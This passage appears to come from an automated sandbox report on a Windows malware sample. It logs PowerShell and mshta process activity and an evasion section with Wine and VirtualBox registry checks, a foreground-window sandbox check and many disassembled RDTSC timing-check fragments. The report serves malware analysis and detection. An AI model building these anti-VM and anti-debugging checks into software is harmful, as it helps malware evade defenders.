                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_0-92296)
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | File opened: HKEY_CURRENT_USER\Software\Wine
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3780E0 second address: 3780E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 364824 second address: 364829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 377160 second address: 377174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF4Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 377174 second address: 377194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F4784F102CCh 0x0000000b pop edx 0x0000000c push eax 0x0000000d jmp 00007F4784F102CAh 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 377194 second address: 37719A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 377302 second address: 377306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 377306 second address: 377312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4785B0BF46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 377639 second address: 377660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4784F102C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F4784F102C6h 0x00000013 jmp 00007F4784F102D4h 0x00000018 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 377660 second address: 37766E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 37766E second address: 377674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 37791A second address: 37791E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 37791E second address: 377952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4784F102D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F4784F102D6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edx 0x00000014 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 377952 second address: 37796F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF58h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3792CA second address: 3792DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3792DE second address: 3792E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3792E4 second address: 37932B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4784F102C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F4784F102D8h 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F4784F102CDh 0x00000021 mov eax, dword ptr [eax] 0x00000023 jo 00007F4784F102CEh 0x00000029 push ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3793CF second address: 3793D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3793D3 second address: 379460 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4784F102C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F4784F102D5h 0x00000013 push 00000000h 0x00000015 and edi, 3625E200h 0x0000001b call 00007F4784F102C9h 0x00000020 pushad 0x00000021 jmp 00007F4784F102CBh 0x00000026 jmp 00007F4784F102D0h 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e push ebx 0x0000002f js 00007F4784F102C6h 0x00000035 pop ebx 0x00000036 pop edx 0x00000037 mov eax, dword ptr [esp+04h] 0x0000003b push ebx 0x0000003c pushad 0x0000003d push edi 0x0000003e pop edi 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 pop ebx 0x00000043 mov eax, dword ptr [eax] 0x00000045 jmp 00007F4784F102D6h 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e pushad 0x0000004f push esi 0x00000050 pushad 0x00000051 popad 0x00000052 pop esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 379460 second address: 379464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 379598 second address: 37959C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 37959C second address: 3795A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3795A0 second address: 3795D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4784F102CBh 0x0000000c jmp 00007F4784F102D6h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pop esi 0x0000001a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3795D1 second address: 379603 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4785B0BF48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D1CEEh], edi 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D2A30h] 0x00000019 push 53538579h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F4785B0BF4Dh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 379603 second address: 379608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 379608 second address: 379621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4785B0BF55h 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 379777 second address: 37977B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 37977B second address: 37977F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 379857 second address: 37989E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 add dword ptr [esp], 6AB32CE5h 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F4784F102C8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 lea ebx, dword ptr [ebp+1246A229h] 0x0000002c mov cl, C0h 0x0000002e xchg eax, ebx 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F4784F102D2h 0x00000037 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 37989E second address: 3798BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 362DC6 second address: 362DE0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F4784F102C6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4784F102CCh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3989C5 second address: 3989CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 398B0A second address: 398B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 398B0E second address: 398B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 398B12 second address: 398B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 398C8C second address: 398CBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4785B0BF53h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F4785B0BF4Ah 0x00000011 push ebx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop ebx 0x00000015 push ebx 0x00000016 jg 00007F4785B0BF46h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 398CBC second address: 398CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 398CC8 second address: 398CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 398CCC second address: 398CD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 398CD2 second address: 398CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4785B0BF4Dh 0x00000009 jmp 00007F4785B0BF4Dh 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 398FA6 second address: 398FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 398FAC second address: 398FE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF55h 0x00000007 jmp 00007F4785B0BF56h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4785B0BF4Ah 0x00000017 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 398FE9 second address: 399010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4784F102D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4784F102CAh 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 399010 second address: 399032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3991BF second address: 3991DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3991DE second address: 3991F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF56h 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3991F8 second address: 3991FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3991FC second address: 399202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 39936E second address: 399393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D7h 0x00000007 jg 00007F4784F102C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 399393 second address: 399397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 399397 second address: 3993BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D9h 0x00000007 jp 00007F4784F102C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 3997F4 second address: 3997FE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4785B0BF4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 371EA0 second address: 371EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 371EA5 second address: 371EBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4785B0BF50h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 399919 second address: 39991E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 39A30D second address: 39A32D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4785B0BF54h 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 39A32D second address: 39A331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 39A5B0 second address: 39A5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4785B0BF4Bh 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 39DB96 second address: 39DB9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 39DB9C second address: 39DBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 39C9A1 second address: 39C9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 39C9A5 second address: 39C9DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4785B0BF57h 0x0000000e popad 0x0000000f push eax 0x00000010 jng 00007F4785B0BF54h 0x00000016 pushad 0x00000017 jg 00007F4785B0BF46h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 39D0F6 second address: 39D0FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 39D0FC second address: 39D109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
